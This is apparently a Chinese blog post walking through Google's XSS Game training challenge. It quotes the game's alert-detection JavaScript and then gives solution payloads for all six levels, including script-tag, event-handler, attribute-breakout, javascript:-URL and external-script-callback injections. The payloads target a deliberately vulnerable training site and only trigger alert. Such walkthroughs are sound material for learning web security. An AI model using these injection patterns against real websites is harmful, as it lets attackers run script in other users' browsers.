zoukankan      html  css  js  c++  java
  • 有趣的游戏:Google XSS Game

    Google最近出了一XSS游戏:

    https://xss-game.appspot.com/

    我这个菜鸟看提示,花了两三个小时才全过了。。

    这个游戏的规则是仅仅要在攻击网页上弹出alert窗体就能够了。

    题目页面是在iframe里嵌套的展现的。那么父窗体是怎样知道iframe里成功弹出了窗体?

    是这样子实现的:

    题目页面载入了这个js,改写了alert函数,当alert被调用时,向parent发送一个消息。

    https://xss-game.appspot.com/static/game-frame.js

    /* If we're being iframed, let the parent know our URL */
    /* Kids: don't do this at home! */
    parent.postMessage(window.location.toString(), "*");
    
    /* Override window.alert */
    var originalAlert = window.alert;
    window.alert = function(s) {
      parent.postMessage("success", "*");
      setTimeout(function() { 
        originalAlert("Congratulations, you executed an alert:
    
    " 
          + s + "
    
    You can now advance to the next level.");
      }, 50);
    }
    
    然后父窗体注冊了一个EventListener来接收这个消息:

    https://xss-game.appspot.com/static/game.js

    window.addEventListener("message", function(event) {
    
      if (!window.location.origin) {
        window.location.origin = window.location.protocol + "//" 
            + window.location.hostname 
            + (window.location.port ?

    ':' + window.location.port: ''); } if (event.origin == window.location.origin && event.data == "success") { userOpenedAlert = true; levelSolved(); return; }

    最以下是题目的答案。假设想自己玩游戏的,慎拉下。














    题目的答案:

    Level1:
    <script>alert(1)</script>
    Level2:
    <input onmouseover="alert(1)">

    Level3:

    https://xss-game.appspot.com/level3/frame#3.jpg' onload="alert(1)">

    Level4:

    3');alert('1

    Level5:

    https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)

    Level6:

    重点是前面要有一个空格。

    ​ https://www.google.com/jsapi?

    callback=alert


    游戏过关之后,google给出了一个xss的文档:

    https://www.google.com/about/appsecurity/learning/xss/index.html


    版权声明:本文博客原创文章。博客,未经同意,不得转载。

  • 相关阅读:
    C#线程同步(1)- 临界区&Lock
    详细解析Java中抽象类和接口的区别
    防止重复提交的几种办法
    网页中实现JSON的编辑与显示
    xcode5 ios7升级后的一系列问题解决
    hadoop-2.0.0-mr1-cdh4.2.0源码编译总结
    hadoop-2.0.0-cdh4.2.1源码编译总结
    cocos2d-iphone加入芒果广告
    hadoop2.0 eclipse 源码编译
    HBase学习笔记
  • 原文地址:https://www.cnblogs.com/mengfanrong/p/4656493.html
Copyright © 2011-2022 走看看